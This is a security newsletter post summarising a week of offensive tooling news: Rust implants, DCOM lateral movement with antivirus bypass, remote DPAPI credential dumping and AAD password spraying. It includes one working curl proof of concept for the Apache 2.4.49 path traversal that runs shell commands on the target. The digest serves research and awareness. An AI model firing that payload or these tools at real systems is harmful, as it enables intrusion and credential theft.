Last Week in Security (LWiS) - 2021-10-06

OffensiveRust (@trickster012), persistence via preview panes (@matterpreter + @mutantvillian), decrypting CyberArk (@jelleverg), enumerate uncommon SMB shares (@podalirius_), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-09-28 to 2021-10-06.

News

Techniques

Tools and Exploits

  • OffensiveRust is a series of experiments in weaponizing Rust for implant development and general offensive operations.
  • Apache HTTP Server 2.4 vulnerabilities. This is a path traversal vulnerability that can lead to RCE. PoC: curl --data "A=|id>>/tmp/x;uname$IFS-a>>/tmp/x" 'http://[IP]:[PORT]/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv (credit to @hackerfantastic). Note that this only affects 2.4.49 (released 2021-09-15) due to this commit from August 2021. Test it out in the CVE-2021-41773 Playground.
  • DCOM_AV_EXEC allows for "diskless" lateral movement to a target on the same network via DCOM. The AV_Bypass_Framework_V3 creates a .NET shellcode runner (output as DLL) which can be used with the DCOM_AV_EXEC tool to bypass antivirus solutions like Microsoft Defender as all shellcode is AES encrypted and executed in memory.
  • kenzer performs automated web assets enumeration & scanning.
  • PHP 7.0-8.0 disable_functions bypass [user_filter] is a 10 year old bug to get around disabled_functions set in php.ini and execute shell commands on the target webserver.
  • DonPAPI dumps DPAPI credentials remotely.
  • aad-sso-enum-brute-spray A PoC for the vulnerability that would, in theory, allow one to perform brute force or password spraying attacks against one or more AAD accounts without causing account lockout or generating log data, thereby making the attack invisible.

-FindUncommonShares is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 which finds uncommon SMB shares on remote machines.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • shottr is a great screenshot tool for macOS. It can do on-device text extraction, blurring, measurements, cropping, etc. The only outbound network traffic is to google analytics (unlike some other screenshot apps).

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.